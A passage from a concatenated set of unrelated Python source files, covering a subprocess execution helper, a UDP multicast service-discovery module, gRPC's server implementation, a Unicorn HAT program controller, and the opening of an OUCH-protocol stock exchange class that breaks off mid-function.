as_binary: Optional[List[str]] = None,
scratch_name: Optional[str] = None,
scratch_directory: Optional[str] = None,
scratch_suffix: Optional[str] = None,
scratch_messy: bool = False,
scratch_exist_ok: bool = False,
blocking_files: Optional[List[str]] = None,
timeout: Optional[int] = None,
interupt_after: Optional[int] = None,
environment: Optional[Dict[str, str]] = None,
shell: Optional[bool] = False,
exit_code: Optional[int] = 0,
) -> Tuple[bool, Dict[str, Any]]:
"""
Runs a process in the background until complete.
Returns True if exit code <= exit_code (default 0)
Parameters
----------
command : list of str
    infiles : Dict[str, str], optional
        Input file names (names, not full paths) and contents to be written
        in the scratch directory. May be {}.
    outfiles : List[str], optional
        Output file names to be collected into a dict after execution.
        May be [].
    outfiles_track : List[str], optional
        Keys of `outfiles` to track without loading their contents into memory.
        For filenames listed in `outfiles_track`, the file path, rather than the
        contents, is stored in `outfiles`. To ensure tracked files are not deleted
        after execution, you must set `scratch_messy=True`.
    as_binary : List[str], optional
Keys of `infiles` or `outfiles` to be treated as bytes.
scratch_name : str, optional
Passed to temporary_directory
scratch_directory : str, optional
Passed to temporary_directory
scratch_suffix : str, optional
Passed to temporary_directory
scratch_messy : bool, optional
Passed to temporary_directory
scratch_exist_ok : bool, optional
Passed to temporary_directory
blocking_files : list, optional
Files which should stop execution if present beforehand.
timeout : int, optional
Stop the process after n seconds.
    interupt_after : int, optional
        Interrupt the process (soft termination, not a hard kill) after n seconds.
environment : dict, optional
The environment to run in
shell : bool, optional
Run command through the shell.
exit_code: int, optional
        The exit code above which the process is considered a failure.
Raises
------
    FileExistsError
        If any file in `blocking_files` is present.
Examples
--------
# execute multiple commands in same dir
>>> success, dexe = qcng.util.execute(['command_1'], infiles, [], scratch_messy=True)
>>> success, dexe = qcng.util.execute(['command_2'], {}, outfiles, scratch_messy=False, scratch_name=Path(dexe['scratch_directory']).name, scratch_exist_ok=True)
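    # collect a binary artifact by path only (hypothetical names; tracked files require scratch_messy=True)
    >>> success, dexe = qcng.util.execute(['command_3'], {}, ['result.bin'], as_binary=['result.bin'], outfiles_track=['result.bin'], scratch_messy=True)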
"""
# Format inputs
if infiles is None:
infiles = {}
if outfiles is None:
outfiles = []
outfiles = {k: None for k in outfiles}
# Check for blocking files
if blocking_files is not None:
for fl in blocking_files:
if os.path.isfile(fl):
raise FileExistsError(
"Existing file can interfere with execute operation.", fl
)
# Format popen
popen_kwargs = {}
if environment is not None:
popen_kwargs["env"] = {k: v for k, v in environment.items() if v is not None}
# Execute
with temporary_directory(
child=scratch_name,
parent=scratch_directory,
messy=scratch_messy,
exist_ok=scratch_exist_ok,
suffix=scratch_suffix,
) as scrdir:
popen_kwargs["cwd"] = scrdir
popen_kwargs["shell"] = shell
with disk_files(
infiles,
outfiles,
cwd=scrdir,
as_binary=as_binary,
outfiles_track=outfiles_track,
) as extrafiles:
with popen(command, popen_kwargs=popen_kwargs) as proc:
# Wait for the subprocess to complete or the timeout to expire
if interupt_after is None:
proc["proc"].wait(timeout=timeout)
else:
time.sleep(interupt_after)
terminate_process(proc["proc"])
retcode = proc["proc"].poll()
proc["outfiles"] = extrafiles
proc["scratch_directory"] = scrdir
return retcode <= exit_code, proc
|
discovery.py | #!/usr/bin/python
import socket
import struct
import threading
import logging
known_services = {}
callbacks = []
cont = False
def init():
logging.debug("initiating discovery")
global cont, thread
cont = True
thread = threading.Thread(target=run)
thread.start()
def run():
global cont
cont = True
MCAST_GRP = '239.255.255.255'
MCAST_PORT = 10001
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('', MCAST_PORT))
mreq = struct.pack("4sl", socket.inet_aton(MCAST_GRP), socket.INADDR_ANY)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
sock.settimeout(0.1)
while cont:
try:
            msg = sock.recv(10240).decode().split('\n')
#logging.debug("Message: " + '||'.join(msg))
if (len(msg) > 0):
if (msg[0] == "notify"): handle_notify(msg)
elif (msg[0] == "hello"): handle_hello(msg)
elif (msg[0] == "bye"): handle_bye(msg)
elif (msg[0] == "search"): handle_search()
else: logging.warning("Unknown message: " + '||'.join(msg))
        except socket.timeout:
            # recv timed out; loop again so `cont` is re-checked
            pass
def store_service(service, endpoint):
logging.debug("Storing service: " + service + " (" + endpoint + ")")
global known_services, callbacks
known_services[service] = endpoint
for c in callbacks:
c(service, True)
def erase_service(service):
logging.debug("Erasing service: " + service)
global known_services, callbacks
del known_services[service]
for c in callbacks:
c(service, False)
def check_service(service, endpoint):
global known_services
if service not in known_services:
store_service(service, endpoint)
elif known_services[service] != endpoint:
erase_service(service)
store_service(service, endpoint)
def handle_notify(msg):
if (len(msg) >= 3):
check_service(msg[1], msg[2])
def handle_bye(msg):
if msg[1] in known_services:
erase_service(msg[1])
def handle_hello(msg):
if (len(msg) >= 3):
check_service(msg[1], msg[2])
def handle_search():
MCAST_GRP = '239.255.255.255'
MCAST_PORT = 10001
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    for s, e in known_services.items():
        msg = "notify\n" + s + "\n" + e
        sock.sendto(msg.encode(), (MCAST_GRP, MCAST_PORT))
def exit():
global cont, thread
cont = False
thread.join()
logging.debug("Discovery exit")
def register(callback):
callbacks.append(callback)
for s in known_services.copy():
callback(s, True)
def get(service):
if service in known_services:
return known_services[service]
else:
raise RuntimeError("Service not found " + service)
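# Illustrative usage (a sketch, not part of the original module):
#
#     init()
#     register(lambda service, present: print(service, "up" if present else "down"))
#     ...
#     endpoint = get("printer")  # hypothetical service name; raises RuntimeError if unknown
#     exit()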
|
_server.py | # Copyright 2016, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Service-side implementation of gRPC Python."""
import collections
import enum
import logging
import threading
import time
import grpc
from grpc import _common
from grpc._cython import cygrpc
from grpc.framework.foundation import callable_util
_SHUTDOWN_TAG = 'shutdown'
_REQUEST_CALL_TAG = 'request_call'
_RECEIVE_CLOSE_ON_SERVER_TOKEN = 'receive_close_on_server'
_SEND_INITIAL_METADATA_TOKEN = 'send_initial_metadata'
_RECEIVE_MESSAGE_TOKEN = 'receive_message'
_SEND_MESSAGE_TOKEN = 'send_message'
_SEND_INITIAL_METADATA_AND_SEND_MESSAGE_TOKEN = (
'send_initial_metadata * send_message')
_SEND_STATUS_FROM_SERVER_TOKEN = 'send_status_from_server'
_SEND_INITIAL_METADATA_AND_SEND_STATUS_FROM_SERVER_TOKEN = (
'send_initial_metadata * send_status_from_server')
_OPEN = 'open'
_CLOSED = 'closed'
_CANCELLED = 'cancelled'
_EMPTY_FLAGS = 0
_EMPTY_METADATA = cygrpc.Metadata(())
_UNEXPECTED_EXIT_SERVER_GRACE = 1.0
def _serialized_request(request_event):
return request_event.batch_operations[0].received_message.bytes()
def _application_code(code):
cygrpc_code = _common.STATUS_CODE_TO_CYGRPC_STATUS_CODE.get(code)
return cygrpc.StatusCode.unknown if cygrpc_code is None else cygrpc_code
def _completion_code(state):
if state.code is None:
return cygrpc.StatusCode.ok
else:
return _application_code(state.code)
def _abortion_code(state, code):
if state.code is None:
return code
else:
return _application_code(state.code)
def _details(state):
return b'' if state.details is None else state.details
class _HandlerCallDetails(
collections.namedtuple('_HandlerCallDetails', (
'method',
'invocation_metadata',)), grpc.HandlerCallDetails):
pass
class _RPCState(object):
def __init__(self):
self.condition = threading.Condition()
self.due = set()
self.request = None
self.client = _OPEN
self.initial_metadata_allowed = True
self.disable_next_compression = False
self.trailing_metadata = None
self.code = None
self.details = None
self.statused = False
self.rpc_errors = []
self.callbacks = []
def _raise_rpc_error(state):
rpc_error = grpc.RpcError()
state.rpc_errors.append(rpc_error)
raise rpc_error
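# Each pending batch operation registers a token in state.due; an RPC is only
# finished once the client side is done (cancelled or statused) and every due
# token has been consumed by its completion callback.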
def _possibly_finish_call(state, token):
state.due.remove(token)
if (state.client is _CANCELLED or state.statused) and not state.due:
callbacks = state.callbacks
state.callbacks = None
return state, callbacks
else:
return None, ()
def _send_status_from_server(state, token):
def send_status_from_server(unused_send_status_from_server_event):
with state.condition:
return _possibly_finish_call(state, token)
return send_status_from_server
def _abort(state, call, code, details):
if state.client is not _CANCELLED:
effective_code = _abortion_code(state, code)
effective_details = details if state.details is None else state.details
if state.initial_metadata_allowed:
operations = (
cygrpc.operation_send_initial_metadata(_EMPTY_METADATA,
_EMPTY_FLAGS),
cygrpc.operation_send_status_from_server(
_common.cygrpc_metadata(state.trailing_metadata),
effective_code, effective_details, _EMPTY_FLAGS),)
token = _SEND_INITIAL_METADATA_AND_SEND_STATUS_FROM_SERVER_TOKEN
else:
operations = (cygrpc.operation_send_status_from_server(
_common.cygrpc_metadata(state.trailing_metadata),
effective_code, effective_details, _EMPTY_FLAGS),)
token = _SEND_STATUS_FROM_SERVER_TOKEN
call.start_server_batch(
cygrpc.Operations(operations),
_send_status_from_server(state, token))
state.statused = True
state.due.add(token)
def _receive_close_on_server(state):
def receive_close_on_server(receive_close_on_server_event):
with state.condition:
if receive_close_on_server_event.batch_operations[
0].received_cancelled:
state.client = _CANCELLED
elif state.client is _OPEN:
state.client = _CLOSED
state.condition.notify_all()
return _possibly_finish_call(state, _RECEIVE_CLOSE_ON_SERVER_TOKEN)
return receive_close_on_server
def _receive_message(state, call, request_deserializer):
def receive_message(receive_message_event):
serialized_request = _serialized_request(receive_message_event)
if serialized_request is None:
with state.condition:
if state.client is _OPEN:
state.client = _CLOSED
state.condition.notify_all()
return _possibly_finish_call(state, _RECEIVE_MESSAGE_TOKEN)
else:
request = _common.deserialize(serialized_request,
request_deserializer)
with state.condition:
if request is None:
_abort(state, call, cygrpc.StatusCode.internal,
b'Exception deserializing request!')
else:
state.request = request
state.condition.notify_all()
return _possibly_finish_call(state, _RECEIVE_MESSAGE_TOKEN)
return receive_message
def _send_initial_metadata(state):
def send_initial_metadata(unused_send_initial_metadata_event):
with state.condition:
return _possibly_finish_call(state, _SEND_INITIAL_METADATA_TOKEN)
return send_initial_metadata
def _send_message(state, token):
def send_message(unused_send_message_event):
with state.condition:
state.condition.notify_all()
return _possibly_finish_call(state, token)
return send_message
class _Context(grpc.ServicerContext):
def __init__(self, rpc_event, state, request_deserializer):
self._rpc_event = rpc_event
self._state = state
self._request_deserializer = request_deserializer
def is_active(self):
with self._state.condition:
return self._state.client is not _CANCELLED and not self._state.statused
def time_remaining(self):
return max(self._rpc_event.request_call_details.deadline - time.time(),
0)
def cancel(self):
self._rpc_event.operation_call.cancel()
def add_callback(self, callback):
with self._state.condition:
if self._state.callbacks is None:
return False
else:
self._state.callbacks.append(callback)
return True
def disable_next_message_compression(self):
with self._state.condition:
self._state.disable_next_compression = True
def invocation_metadata(self):
return _common.application_metadata(self._rpc_event.request_metadata)
def peer(self):
return _common.decode(self._rpc_event.operation_call.peer())
def send_initial_metadata(self, initial_metadata):
with self._state.condition:
if self._state.client is _CANCELLED:
_raise_rpc_error(self._state)
else:
if self._state.initial_metadata_allowed:
operation = cygrpc.operation_send_initial_metadata(
_common.cygrpc_metadata(initial_metadata), _EMPTY_FLAGS)
self._rpc_event.operation_call.start_server_batch(
cygrpc.Operations((operation,)),
_send_initial_metadata(self._state))
self._state.initial_metadata_allowed = False
self._state.due.add(_SEND_INITIAL_METADATA_TOKEN)
else:
raise ValueError('Initial metadata no longer allowed!')
def set_trailing_metadata(self, trailing_metadata):
with self._state.condition:
self._state.trailing_metadata = _common.cygrpc_metadata(
trailing_metadata)
def set_code(self, code):
with self._state.condition:
self._state.code = code
def set_details(self, details):
with self._state.condition:
self._state.details = _common.encode(details)
class _RequestIterator(object):
def __init__(self, state, call, request_deserializer):
self._state = state
self._call = call
self._request_deserializer = request_deserializer
def _raise_or_start_receive_message(self):
if self._state.client is _CANCELLED:
_raise_rpc_error(self._state)
elif self._state.client is _CLOSED or self._state.statused:
raise StopIteration()
else:
self._call.start_server_batch(
cygrpc.Operations(
(cygrpc.operation_receive_message(_EMPTY_FLAGS),)),
_receive_message(self._state, self._call,
self._request_deserializer))
self._state.due.add(_RECEIVE_MESSAGE_TOKEN)
def _look_for_request(self):
if self._state.client is _CANCELLED:
_raise_rpc_error(self._state)
elif (self._state.request is None and
_RECEIVE_MESSAGE_TOKEN not in self._state.due):
raise StopIteration()
else:
request = self._state.request
self._state.request = None
return request
def _next(self):
with self._state.condition:
self._raise_or_start_receive_message()
while True:
self._state.condition.wait()
request = self._look_for_request()
if request is not None:
return request
def __iter__(self):
return self
def __next__(self):
return self._next()
def next(self):
return self._next()
def _unary_request(rpc_event, state, request_deserializer):
def unary_request():
with state.condition:
if state.client is _CANCELLED or state.statused:
return None
else:
start_server_batch_result = rpc_event.operation_call.start_server_batch(
cygrpc.Operations(
(cygrpc.operation_receive_message(_EMPTY_FLAGS),)),
_receive_message(state, rpc_event.operation_call,
request_deserializer))
state.due.add(_RECEIVE_MESSAGE_TOKEN)
while True:
state.condition.wait()
if state.request is None:
if state.client is _CLOSED:
details = '"{}" requires exactly one request message.'.format(
rpc_event.request_call_details.method)
_abort(state, rpc_event.operation_call,
cygrpc.StatusCode.unimplemented,
_common.encode(details))
return None
elif state.client is _CANCELLED:
return None
else:
request = state.request
state.request = None
return request
return unary_request
def _call_behavior(rpc_event, state, behavior, argument, request_deserializer):
context = _Context(rpc_event, state, request_deserializer)
try:
return behavior(argument, context), True
except Exception as e: # pylint: disable=broad-except
with state.condition:
if e not in state.rpc_errors:
details = 'Exception calling application: {}'.format(e)
logging.exception(details)
_abort(state, rpc_event.operation_call,
cygrpc.StatusCode.unknown, _common.encode(details))
return None, False
def _take_response_from_response_iterator(rpc_event, state, response_iterator):
try:
return next(response_iterator), True
except StopIteration:
return None, True
except Exception as e: # pylint: disable=broad-except
with state.condition:
if e not in state.rpc_errors:
details = 'Exception iterating responses: {}'.format(e)
logging.exception(details)
_abort(state, rpc_event.operation_call,
cygrpc.StatusCode.unknown, _common.encode(details))
return None, False
def _serialize_response(rpc_event, state, response, response_serializer):
serialized_response = _common.serialize(response, response_serializer)
if serialized_response is None:
with state.condition:
_abort(state, rpc_event.operation_call, cygrpc.StatusCode.internal,
b'Failed to serialize response!')
return None
else:
return serialized_response
def _send_response(rpc_event, state, serialized_response):
with state.condition:
if state.client is _CANCELLED or state.statused:
return False
else:
if state.initial_metadata_allowed:
operations = (
cygrpc.operation_send_initial_metadata(_EMPTY_METADATA,
_EMPTY_FLAGS),
cygrpc.operation_send_message(serialized_response,
_EMPTY_FLAGS),)
state.initial_metadata_allowed = False
token = _SEND_INITIAL_METADATA_AND_SEND_MESSAGE_TOKEN
else:
operations = (cygrpc.operation_send_message(serialized_response,
_EMPTY_FLAGS),)
token = _SEND_MESSAGE_TOKEN
rpc_event.operation_call.start_server_batch(
cygrpc.Operations(operations), _send_message(state, token))
state.due.add(token)
while True:
state.condition.wait()
if token not in state.due:
return state.client is not _CANCELLED and not state.statused
def _status(rpc_event, state, serialized_response):
with state.condition:
if state.client is not _CANCELLED:
trailing_metadata = _common.cygrpc_metadata(state.trailing_metadata)
code = _completion_code(state)
details = _details(state)
operations = [
cygrpc.operation_send_status_from_server(
trailing_metadata, code, details, _EMPTY_FLAGS),
]
if state.initial_metadata_allowed:
operations.append(
cygrpc.operation_send_initial_metadata(_EMPTY_METADATA,
_EMPTY_FLAGS))
if serialized_response is not None:
operations.append(
cygrpc.operation_send_message(serialized_response,
_EMPTY_FLAGS))
rpc_event.operation_call.start_server_batch(
cygrpc.Operations(operations),
_send_status_from_server(state, _SEND_STATUS_FROM_SERVER_TOKEN))
state.statused = True
state.due.add(_SEND_STATUS_FROM_SERVER_TOKEN)
def _unary_response_in_pool(rpc_event, state, behavior, argument_thunk,
request_deserializer, response_serializer):
argument = argument_thunk()
if argument is not None:
response, proceed = _call_behavior(rpc_event, state, behavior, argument,
request_deserializer)
if proceed:
serialized_response = _serialize_response(
rpc_event, state, response, response_serializer)
if serialized_response is not None:
_status(rpc_event, state, serialized_response)
def _stream_response_in_pool(rpc_event, state, behavior, argument_thunk,
request_deserializer, response_serializer):
argument = argument_thunk()
if argument is not None:
response_iterator, proceed = _call_behavior(
rpc_event, state, behavior, argument, request_deserializer)
if proceed:
while True:
response, proceed = _take_response_from_response_iterator(
rpc_event, state, response_iterator)
if proceed:
if response is None:
_status(rpc_event, state, None)
break
else:
serialized_response = _serialize_response(
rpc_event, state, response, response_serializer)
if serialized_response is not None:
proceed = _send_response(rpc_event, state,
serialized_response)
if not proceed:
break
else:
break
else:
break
def _handle_unary_unary(rpc_event, state, method_handler, thread_pool):
unary_request = _unary_request(rpc_event, state,
method_handler.request_deserializer)
thread_pool.submit(_unary_response_in_pool, rpc_event, state,
method_handler.unary_unary, unary_request,
method_handler.request_deserializer,
method_handler.response_serializer)
def _handle_unary_stream(rpc_event, state, method_handler, thread_pool):
unary_request = _unary_request(rpc_event, state,
method_handler.request_deserializer)
thread_pool.submit(_stream_response_in_pool, rpc_event, state,
method_handler.unary_stream, unary_request,
method_handler.request_deserializer,
method_handler.response_serializer)
def _handle_stream_unary(rpc_event, state, method_handler, thread_pool):
request_iterator = _RequestIterator(state, rpc_event.operation_call,
method_handler.request_deserializer)
thread_pool.submit(_unary_response_in_pool, rpc_event, state,
method_handler.stream_unary, lambda: request_iterator,
method_handler.request_deserializer,
method_handler.response_serializer)
def _handle_stream_stream(rpc_event, state, method_handler, thread_pool):
request_iterator = _RequestIterator(state, rpc_event.operation_call,
method_handler.request_deserializer)
thread_pool.submit(_stream_response_in_pool, rpc_event, state,
method_handler.stream_stream, lambda: request_iterator,
method_handler.request_deserializer,
method_handler.response_serializer)
def _find_method_handler(rpc_event, generic_handlers):
for generic_handler in generic_handlers:
method_handler = generic_handler.service(
_HandlerCallDetails(
_common.decode(rpc_event.request_call_details.method),
rpc_event.request_metadata))
if method_handler is not None:
return method_handler
else:
return None
def _handle_unrecognized_method(rpc_event):
operations = (
cygrpc.operation_send_initial_metadata(_EMPTY_METADATA, _EMPTY_FLAGS),
cygrpc.operation_receive_close_on_server(_EMPTY_FLAGS),
cygrpc.operation_send_status_from_server(
_EMPTY_METADATA, cygrpc.StatusCode.unimplemented,
b'Method not found!', _EMPTY_FLAGS),)
rpc_state = _RPCState()
    rpc_event.operation_call.start_server_batch(
        cygrpc.Operations(operations),
        lambda ignored_event: (
            rpc_state,
            (),))
return rpc_state
def _handle_with_method_handler(rpc_event, method_handler, thread_pool):
state = _RPCState()
with state.condition:
rpc_event.operation_call.start_server_batch(
cygrpc.Operations(
(cygrpc.operation_receive_close_on_server(_EMPTY_FLAGS),)),
_receive_close_on_server(state))
state.due.add(_RECEIVE_CLOSE_ON_SERVER_TOKEN)
if method_handler.request_streaming:
if method_handler.response_streaming:
_handle_stream_stream(rpc_event, state, method_handler,
thread_pool)
else:
_handle_stream_unary(rpc_event, state, method_handler,
thread_pool)
else:
if method_handler.response_streaming:
_handle_unary_stream(rpc_event, state, method_handler,
thread_pool)
else:
_handle_unary_unary(rpc_event, state, method_handler,
thread_pool)
return state
def _handle_call(rpc_event, generic_handlers, thread_pool):
if rpc_event.request_call_details.method is not None:
method_handler = _find_method_handler(rpc_event, generic_handlers)
if method_handler is None:
return _handle_unrecognized_method(rpc_event)
else:
return _handle_with_method_handler(rpc_event, method_handler,
thread_pool)
else:
return None
@enum.unique
class _ServerStage(enum.Enum):
STOPPED = 'stopped'
STARTED = 'started'
GRACE = 'grace'
class _ServerState(object):
def __init__(self, completion_queue, server, generic_handlers, thread_pool):
self.lock = threading.Lock()
self.completion_queue = completion_queue
self.server = server
self.generic_handlers = list(generic_handlers)
self.thread_pool = thread_pool
self.stage = _ServerStage.STOPPED
self.shutdown_events = None
# TODO(https://github.com/grpc/grpc/issues/6597): eliminate these fields.
self.rpc_states = set()
self.due = set()
def _add_generic_handlers(state, generic_handlers):
with state.lock:
state.generic_handlers.extend(generic_handlers)
def _add_insecure_port(state, address):
with state.lock:
return state.server.add_http2_port(address)
def _add_secure_port(state, address, server_credentials):
with state.lock:
return state.server.add_http2_port(address,
server_credentials._credentials)
def _request_call(state):
state.server.request_call(state.completion_queue, state.completion_queue,
_REQUEST_CALL_TAG)
state.due.add(_REQUEST_CALL_TAG)
# TODO(https://github.com/grpc/grpc/issues/6597): delete this function.
def _stop_serving(state):
if not state.rpc_states and not state.due:
for shutdown_event in state.shutdown_events:
shutdown_event.set()
state.stage = _ServerStage.STOPPED
return True
else:
return False
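# Completion-queue event loop: handles shutdown tags, accepts new calls, and
# dispatches per-RPC completion callbacks until the server has fully stopped.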
def _serve(state):
while True:
event = state.completion_queue.poll()
if event.tag is _SHUTDOWN_TAG:
with state.lock:
state.due.remove(_SHUTDOWN_TAG)
if _stop_serving(state):
return
elif event.tag is _REQUEST_CALL_TAG:
with state.lock:
state.due.remove(_REQUEST_CALL_TAG)
rpc_state = _handle_call(event, state.generic_handlers,
state.thread_pool)
if rpc_state is not None:
state.rpc_states.add(rpc_state)
if state.stage is _ServerStage.STARTED:
_request_call(state)
elif _stop_serving(state):
return
else:
rpc_state, callbacks = event.tag(event)
for callback in callbacks:
callable_util.call_logging_exceptions(
callback, 'Exception calling callback!')
if rpc_state is not None:
with state.lock:
state.rpc_states.remove(rpc_state)
if _stop_serving(state):
return
def _stop(state, grace):
with state.lock:
if state.stage is _ServerStage.STOPPED:
shutdown_event = threading.Event()
shutdown_event.set()
return shutdown_event
else:
if state.stage is _ServerStage.STARTED:
state.server.shutdown(state.completion_queue, _SHUTDOWN_TAG)
state.stage = _ServerStage.GRACE
state.shutdown_events = []
state.due.add(_SHUTDOWN_TAG)
shutdown_event = threading.Event()
state.shutdown_events.append(shutdown_event)
if grace is None:
state.server.cancel_all_calls()
# TODO(https://github.com/grpc/grpc/issues/6597): delete this loop.
for rpc_state in state.rpc_states:
with rpc_state.condition:
rpc_state.client = _CANCELLED
rpc_state.condition.notify_all()
else:
def cancel_all_calls_after_grace():
shutdown_event.wait(timeout=grace)
with state.lock:
state.server.cancel_all_calls()
# TODO(https://github.com/grpc/grpc/issues/6597): delete this loop.
for rpc_state in state.rpc_states:
with rpc_state.condition:
rpc_state.client = _CANCELLED
rpc_state.condition.notify_all()
thread = threading.Thread(target=cancel_all_calls_after_grace)
thread.start()
return shutdown_event
shutdown_event.wait()
return shutdown_event
def _start(state):
with state.lock:
if state.stage is not _ServerStage.STOPPED:
raise ValueError('Cannot start already-started server!')
state.server.start()
state.stage = _ServerStage.STARTED
_request_call(state)
def cleanup_server(timeout):
if timeout is None:
_stop(state, _UNEXPECTED_EXIT_SERVER_GRACE).wait()
else:
_stop(state, timeout).wait()
thread = _common.CleanupThread(
cleanup_server, target=_serve, args=(state,))
thread.start()
class Server(grpc.Server):
def __init__(self, thread_pool, generic_handlers, options):
completion_queue = cygrpc.CompletionQueue()
server = cygrpc.Server(_common.channel_args(options))
server.register_completion_queue(completion_queue)
self._state = _ServerState(completion_queue, server, generic_handlers,
thread_pool)
def add_generic_rpc_handlers(self, generic_rpc_handlers):
_add_generic_handlers(self._state, generic_rpc_handlers)
def add_insecure_port(self, address):
return _add_insecure_port(self._state, _common.encode(address))
def add_secure_port(self, address, server_credentials):
return _add_secure_port(self._state,
_common.encode(address), server_credentials)
def start(self):
_start(self._state)
def stop(self, grace):
return _stop(self._state, grace)
def __del__(self):
_stop(self._state, None)
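# --- Illustrative usage (a sketch, not part of the original module) ---
# Normally this Server is constructed via the public grpc.server() API; the
# handler below is hypothetical.
#
#     from concurrent import futures
#
#     class _EchoHandler(grpc.GenericRpcHandler):
#         def service(self, handler_call_details):
#             if handler_call_details.method == '/test/Echo':
#                 return grpc.unary_unary_rpc_method_handler(lambda request, context: request)
#             return None
#
#     server = Server(futures.ThreadPoolExecutor(max_workers=4), (_EchoHandler(),), ())
#     port = server.add_insecure_port('[::]:50051')
#     server.start()
#     ...
#     server.stop(grace=5).wait()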
|
state.py | import multiprocessing
import importlib
import sys
import os
class State:
''' Handles the Unicorn HAT state'''
def __init__(self, is_hd=True):
self._process = None
self.set_model(is_hd)
def set_model(self, is_hd):
self.is_hd = is_hd
if self.is_hd is True:
import unicornhathd
import app.programs.hd
self._unicornhat = unicornhathd
self._app_programs = app.programs.hd.list
else:
import unicornhat
import app.programs.original
self._unicornhat = unicornhat
self._app_programs = app.programs.original.list
    def start_program(self, name, params=None):
        params = params or {}
program = self._get_program(name)
self.stop_program()
self._set_rotation(params)
self._set_brightness(params)
self._start_process(program, params)
def stop_program(self):
if self._process is not None:
self._process.terminate()
self._unicornhat.show()
def _get_program(self, name):
try:
return self._app_programs[name]
except KeyError:
raise ProgramNotFound(name)
def _set_brightness(self, params):
if params.get("brightness") is not None:
brightness = float(params["brightness"])
if 0 <= brightness <= 1:
self._unicornhat.brightness(brightness)
else:
raise ValueError("Brightness must be between 0.0 and 1.0")
def _set_rotation(self, params):
if params.get("rotation") is not None:
rotation = int(params["rotation"])
if rotation in [0, 90, 180, 270]:
self._unicornhat.rotation(rotation)
else:
raise ValueError("Rotation must be 0, 90, 180 or 270 degrees")
    def _start_process(self, program, params):
        def run_program(params):
            importlib.import_module(program.location).run(params)
        self._process = multiprocessing.Process(target=run_program, args=(params,))
        self._process.start()
state = State()
class ProgramNotFound(Exception):
pass
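# Illustrative usage (a sketch; requires Unicorn HAT hardware and assumes a
# program named "rainbow" is registered in app.programs):
#
#     state.start_program("rainbow", {"brightness": 0.5, "rotation": 180})
#     ...
#     state.stop_program()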
|
Exchange.py | """
The Ouch Team
Exchange Integration
Integration of all required classes together into a working implementation. Will be changed
as new components are added. This is mostly for knowing what we have to implement in future modules.
"""
import threading
import time
from src.OrderBook import OrderBook
from src.receiver import Receiver
from src.util import Util
from src.console import Console
class Exchange():
PRICE_MAX = 214748364.6
QUANTITY_MAX = 2147483647
def __init__(self, debug="default"):
"""
An instance of this class should be initialised before trying to establish a connection using client.py.
All program components are integrated together with this class, connecting the
receiver, orderbook, and output components. When this program is called, it will output
the Orderbook to the console once every second.
"""
# Exchange state variables
self.open = True
# Connection receiver
self.connection_manager = Receiver()
self.msg_queue = self.connection_manager.get_queue()
# Orderbook
self.orderbook_lock = threading.Lock()
self.orderbook = OrderBook()
# Outputting orderbook once per second, change to silent-mode later.
self.debug = debug
self.print_dict = threading.Event()
self.printer = threading.Thread(name="printer", target=lambda: self._print_orderbook_thread(), daemon=True)
self.printer.start()
self.operation_thread = threading.Thread(name="operate", target=lambda: self._operate(), daemon=True)
self.operation_thread.start()
def open_exchange(self):
"""Open the exchange and allow clients to place orders."""
self.open = True
def close_exchange(self):
"""Close the exchange and prevent clients from place orders."""
self.open = False
self.connection_manager.terminate()
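    # Illustrative usage (a sketch, not part of the original module; assumes
    # clients connect via client.py and submit OUCH messages):
    #
    #     exchange = Exchange(debug="none")
    #     ...
    #     exchange.close_exchange()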
def _operate(self):
"""
Exchange's main function. Continuously retrieves messages from the reveiver's
Queue, parses it into dictionary format, validates the order format, passes it to the
OrderBook, then sends any OrderBook response back to the receiver.
A thread of this function is automatically created upon initialisation.
"""
while True:
# Wait until queue has messages, then retrieve it.
# The message is a dictionary with {"client_id": int, "header": bytes, "body": bytes}
msg = self.msg_queue.get()
# A new client has established a connection.
if msg["type"] == "C":
# Acknowledge the connection by returning a server event message.
if not self.open:
outbound = ["S", Util.get_server_time(), "S"]
else:
outbound = ["S", Util.get_server_time(), "E"]
self.connection_manager.send_message(msg["id"], Util.package(outbound))
else:
# Parse message if it's not a connection.
client_id = msg["id"]
content = Util.unpackage(msg["header"], msg["body"])
# Validate order fields according to the OUCH protocol.
valid, outbound = self._validate_order_syntax(content, client_id)
msg_type = content["message_type"]
cancel_repl_reason = None
if not valid:
# If a replacement order is not valid, cancel the order.
                    if msg_type == 'U':
                        # Section 6.3: treat an invalid replacement as a cancel.
                        msg_type = "X"
content = {
"message_type": "X",
"order_token": content["existing_order_token"],
"quantity": content["quantity"]
}
valid = True
cancel_repl_reason = outbound[0] # Remember order cancelled reason
# Pass valid order into the orderbook
if valid:
self.orderbook_lock.acquire()
success, outbound = self.orderbook.handle_order(client_id, content)
self.orderbook_lock.release()
if len(outbound) == 0:
self.print_dict.set()
continue
# Send outbound message back to client.
                if cancel_repl_reason is not None:
if len(outbound) != 5:
